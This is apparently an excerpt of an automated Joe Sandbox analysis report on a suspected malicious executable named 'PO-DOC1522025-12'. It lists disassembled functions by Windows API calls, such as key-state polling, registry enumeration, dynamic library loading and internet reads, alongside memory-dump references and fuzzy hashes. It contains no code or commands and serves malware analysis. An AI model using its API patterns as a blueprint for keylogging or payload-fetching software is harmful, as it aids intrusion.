                                                                                    • _free.LIBCMT ref: 0017BB7F
                                                                                      • Part of subcall function 001729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000), ref: 001729DE
                                                                                      • Part of subcall function 001729C8: GetLastError.KERNEL32(00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000,00000000), ref: 001729F0
                                                                                    • _free.LIBCMT ref: 0017BD4B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                    • String ID:
                                                                                    • API String ID: 1286116820-0
                                                                                    • Opcode ID: c98f79dc140429f3cfc5f78b6f84dc84c0220dc631eabd81b90122caea9db230
                                                                                    • Instruction ID: 848cd77af235fae4ef79780425fedc6c0f43b3940f3ddfcb327472920e0b4d28
                                                                                    • Opcode Fuzzy Hash: c98f79dc140429f3cfc5f78b6f84dc84c0220dc631eabd81b90122caea9db230
                                                                                    • Instruction Fuzzy Hash: 53510971908219AFCB10EF65DCC5AAEB7BCEF54310F10C26AE918D7191EB305E81CB50
                                                                                    APIs
                                                                                      • Part of subcall function 001ADDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001ACF22,?), ref: 001ADDFD
                                                                                      • Part of subcall function 001ADDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001ACF22,?), ref: 001ADE16
                                                                                      • Part of subcall function 001AE199: GetFileAttributesW.KERNEL32(?,001ACF95), ref: 001AE19A
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 001AE473
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 001AE4AC
                                                                                    • _wcslen.LIBCMT ref: 001AE5EB
                                                                                    • _wcslen.LIBCMT ref: 001AE603
                                                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 001AE650
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 3183298772-0
                                                                                    • Opcode ID: e960fd1fcd078c6baa5dad3b1a3e5527ea25e4d656829d3738d9e42f7b3cb8b6
                                                                                    • Instruction ID: c46419c78065040ceb723dfcee605ee0fc51b6527289aa40f54b454da4aef3f2
                                                                                    • Opcode Fuzzy Hash: e960fd1fcd078c6baa5dad3b1a3e5527ea25e4d656829d3738d9e42f7b3cb8b6
                                                                                    • Instruction Fuzzy Hash: 1A5177B64083459BC724EBA4DC819DFB3ECAF95340F00491EF589D3191EF74A688C766
                                                                                    APIs
                                                                                      • Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD
                                                                                      • Part of subcall function 001CC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001CB6AE,?,?), ref: 001CC9B5
                                                                                      • Part of subcall function 001CC998: _wcslen.LIBCMT ref: 001CC9F1
                                                                                      • Part of subcall function 001CC998: _wcslen.LIBCMT ref: 001CCA68
                                                                                      • Part of subcall function 001CC998: _wcslen.LIBCMT ref: 001CCA9E
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001CBAA5
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001CBB00
                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 001CBB63
                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 001CBBA6
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 001CBBB3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                    • String ID:
                                                                                    • API String ID: 826366716-0
                                                                                    • Opcode ID: 5cf78c4db6adb106b16748efb7bd2f05f2e1d73c1beb5bc95713fc36d4d53442
                                                                                    • Instruction ID: 72d95ab3595897a5baead23a26cd3705e1a86980a4293510d4bbc0da26168f13
                                                                                    • Opcode Fuzzy Hash: 5cf78c4db6adb106b16748efb7bd2f05f2e1d73c1beb5bc95713fc36d4d53442
                                                                                    • Instruction Fuzzy Hash: 85614831209241AFD714DF24C4D1F2ABBE5BF94308F54895DF49A8B2A2DB31ED45CB92
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 001A8BCD
                                                                                    • VariantClear.OLEAUT32 ref: 001A8C3E
                                                                                    • VariantClear.OLEAUT32 ref: 001A8C9D
                                                                                    • VariantClear.OLEAUT32(?), ref: 001A8D10
                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 001A8D3B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                    • String ID:
                                                                                    • API String ID: 4136290138-0
                                                                                    • Opcode ID: 7ebed7fc21fc50eb0b2cc193355692db47bd7876b280dbb972aa460ee9b4a7df
                                                                                    • Instruction ID: 048c8e28eb2deb29c1415dd87a6122ce19330172609013ebe90f6b3d131b5f67
                                                                                    • Opcode Fuzzy Hash: 7ebed7fc21fc50eb0b2cc193355692db47bd7876b280dbb972aa460ee9b4a7df
                                                                                    • Instruction Fuzzy Hash: EE516AB5A0121AEFCB14CF68C894AAAB7F8FF89310B158559F905DB354E730E911CF90
                                                                                    APIs
                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001B8BAE
                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 001B8BDA
                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 001B8C32
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 001B8C57
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 001B8C5F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                    • String ID:
                                                                                    • API String ID: 2832842796-0
                                                                                    • Opcode ID: 719f8172d98135b42445a9c04e8e4c760857b691f1e97dfa03cb851491d9cc99
                                                                                    • Instruction ID: 738a4f78af8089a40e3b549cb8c7be5e98ad8a94728736a62a3a9e58922b4337
                                                                                    • Opcode Fuzzy Hash: 719f8172d98135b42445a9c04e8e4c760857b691f1e97dfa03cb851491d9cc99
                                                                                    • Instruction Fuzzy Hash: C1512875A002159FCB05DF65C881AAABBF5FF48314F088459E849AB3B2DB35ED51CB90
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 001C8F40
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 001C8FD0
                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 001C8FEC
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 001C9032
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 001C9052
                                                                                      • Part of subcall function 0015F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,001B1043,?,7644E610), ref: 0015F6E6
                                                                                      • Part of subcall function 0015F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0019FA64,00000000,00000000,?,?,001B1043,?,7644E610,?,0019FA64), ref: 0015F70D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                    • String ID:
                                                                                    • API String ID: 666041331-0
                                                                                    • Opcode ID: ce8d13a4050b1d7f0f5d254d45da252827499b6547bff89c8d586ae3e7067022
                                                                                    • Instruction ID: 14fa0a7a4b2b2640e162c758637414073ca3406c4294e3050a6cd54f33537709
                                                                                    • Opcode Fuzzy Hash: ce8d13a4050b1d7f0f5d254d45da252827499b6547bff89c8d586ae3e7067022
                                                                                    • Instruction Fuzzy Hash: D2513534A05215DFCB05DF58C484DADBBB1FF69314B0980A9E80A9B762DB31ED86CB90
                                                                                    APIs
                                                                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 001D6C33
                                                                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 001D6C4A
                                                                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 001D6C73
                                                                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,001BAB79,00000000,00000000), ref: 001D6C98
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 001D6CC7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$MessageSendShow
                                                                                    • String ID:
                                                                                    • API String ID: 3688381893-0
                                                                                    • Opcode ID: fe51cd4b2c5088998e01b1a8b84e335c581797af07b7dfdbfba988c6a800d840
                                                                                    • Instruction ID: d8c08e374064cc273af92447653a93efeabeffe638020d2ded08664b64c00f6e
                                                                                    • Opcode Fuzzy Hash: fe51cd4b2c5088998e01b1a8b84e335c581797af07b7dfdbfba988c6a800d840
                                                                                    • Instruction Fuzzy Hash: 0E41E635614114AFDB24CF28CC98FEA7BA5EB09350F15026AF999A73E0C771ED41DA80
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: ab8ae8fc89a6dfd9b0ce37625ec2355d6c357b6f443d29ba13e3b0529de5367d
                                                                                    • Instruction ID: 511fc9405644cc3c8be0d579a4c476cf79d1799ccfefca453c055531b734c222
                                                                                    • Opcode Fuzzy Hash: ab8ae8fc89a6dfd9b0ce37625ec2355d6c357b6f443d29ba13e3b0529de5367d
                                                                                    • Instruction Fuzzy Hash: D041C472A002009FCB24DF78C881A5DB7F5FF99314F658569EA19EB352D731AD02CB91
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(?), ref: 00159141
                                                                                    • ScreenToClient.USER32(00000000,?), ref: 0015915E
                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00159183
                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 0015919D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                    • String ID:
                                                                                    • API String ID: 4210589936-0
                                                                                    • Opcode ID: 0c78fd69e341537e95090f969521461aee359297f8da3e9c0f3de2285a32b5f6
                                                                                    • Instruction ID: cf3c5d04cdf6d6649ee2d0940100e0808dd794b2e223732ec346386997748ebf
                                                                                    • Opcode Fuzzy Hash: 0c78fd69e341537e95090f969521461aee359297f8da3e9c0f3de2285a32b5f6
                                                                                    • Instruction Fuzzy Hash: C6413D71A0861AEBDF199F64C884BEEB774FF15321F208226E835A62D0C7306954CB91
                                                                                    APIs
                                                                                    • GetInputState.USER32 ref: 001B38CB
                                                                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 001B3922
                                                                                    • TranslateMessage.USER32(?), ref: 001B394B
                                                                                    • DispatchMessageW.USER32(?), ref: 001B3955
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001B3966
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                    • String ID:
                                                                                    • API String ID: 2256411358-0
                                                                                    • Opcode ID: ffc6c4c8c4aca65f6e6c2dc88fb38cecc2bc6f1aadd4c6e081a5b555d55c9a92
                                                                                    • Instruction ID: 6169710d6442e2d840355b458237d5f9afc364e468d29a0b7d910f21c35d30de
                                                                                    • Opcode Fuzzy Hash: ffc6c4c8c4aca65f6e6c2dc88fb38cecc2bc6f1aadd4c6e081a5b555d55c9a92
                                                                                    • Instruction Fuzzy Hash: E131C970905342EEEB39CB34EC4CBF637A8AB15308F44456DE572C21A0EBB5A6A5CB51
                                                                                    APIs
                                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,001BC21E,00000000), ref: 001BCF38
                                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 001BCF6F
                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,001BC21E,00000000), ref: 001BCFB4
                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,001BC21E,00000000), ref: 001BCFC8
                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,001BC21E,00000000), ref: 001BCFF2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                    • String ID:
                                                                                    • API String ID: 3191363074-0
                                                                                    • Opcode ID: a00a9f6a2accf0f0509e227d28451ed72258b2f062fc82091ed4ffdac7eef2f9
                                                                                    • Instruction ID: 409c3da3017ef487ff03cd6fdf6860466e65024d0afdf95f022c9b8384eeebdb
                                                                                    • Opcode Fuzzy Hash: a00a9f6a2accf0f0509e227d28451ed72258b2f062fc82091ed4ffdac7eef2f9
                                                                                    • Instruction Fuzzy Hash: 2A314A71A01206EFDB24DFA9C884ABBBBF9EB14351B1044AEF516D2140DB30EE41DBE0
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(?,?), ref: 001A1915
                                                                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 001A19C1
                                                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 001A19C9
                                                                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 001A19DA
                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 001A19E2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3382505437-0
                                                                                    • Opcode ID: 7eb3d221852dd1504be6157637e4e55cb36e725b6bb549375773801769f97274
                                                                                    • Instruction ID: 7129e8bb277980fcbdf2716e68697975dffc3b8dae75db30350af627a778f020
                                                                                    • Opcode Fuzzy Hash: 7eb3d221852dd1504be6157637e4e55cb36e725b6bb549375773801769f97274
                                                                                    • Instruction Fuzzy Hash: 0C31BF76A0121AFFCB04CFA8CD99ADF3BB5EB05319F104629F921AB2D1C7709944CB90
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 001D5745
                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 001D579D
                                                                                    • _wcslen.LIBCMT ref: 001D57AF
                                                                                    • _wcslen.LIBCMT ref: 001D57BA
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 001D5816
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 763830540-0
                                                                                    • Opcode ID: b0c9cfdd61e5247263a3837554f9975e1e4e07b141d6b7c9246726ab53f41fb5
                                                                                    • Instruction ID: 7f5c2fcafc1bd3fdbd5c267cfe95be05df1cf6572acf9133cb035c9fc1756304
                                                                                    • Opcode Fuzzy Hash: b0c9cfdd61e5247263a3837554f9975e1e4e07b141d6b7c9246726ab53f41fb5
                                                                                    • Instruction Fuzzy Hash: AE218071905618DADB209FA4CC85AEE7BB9FF14724F10821BE929EA2C0E7709985CF51
                                                                                    APIs
                                                                                    • IsWindow.USER32(00000000), ref: 001C0951
                                                                                    • GetForegroundWindow.USER32 ref: 001C0968
                                                                                    • GetDC.USER32(00000000), ref: 001C09A4
                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 001C09B0
                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 001C09E8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                    • String ID:
                                                                                    • API String ID: 4156661090-0
                                                                                    • Opcode ID: dd68991fc65110b58f974b20f5167959b8c23c92481e12df93244074ea06b892
                                                                                    • Instruction ID: 06abff5f4db7880bf46fd86864ab1dd2b96cab482a5d338267405614c1a7e305
                                                                                    • Opcode Fuzzy Hash: dd68991fc65110b58f974b20f5167959b8c23c92481e12df93244074ea06b892
                                                                                    • Instruction Fuzzy Hash: 5F216D35601214AFD704EF69D894AAEBBF9EF58700F04846DE84AD7762CB30EC44CB90
                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0017CDC6
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0017CDE9
                                                                                      • Part of subcall function 00173820: RtlAllocateHeap.NTDLL(00000000,?,00211444,?,0015FDF5,?,?,0014A976,00000010,00211440,001413FC,?,001413C6,?,00141129), ref: 00173852
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0017CE0F
                                                                                    • _free.LIBCMT ref: 0017CE22
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0017CE31
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                    • String ID:
                                                                                    • API String ID: 336800556-0
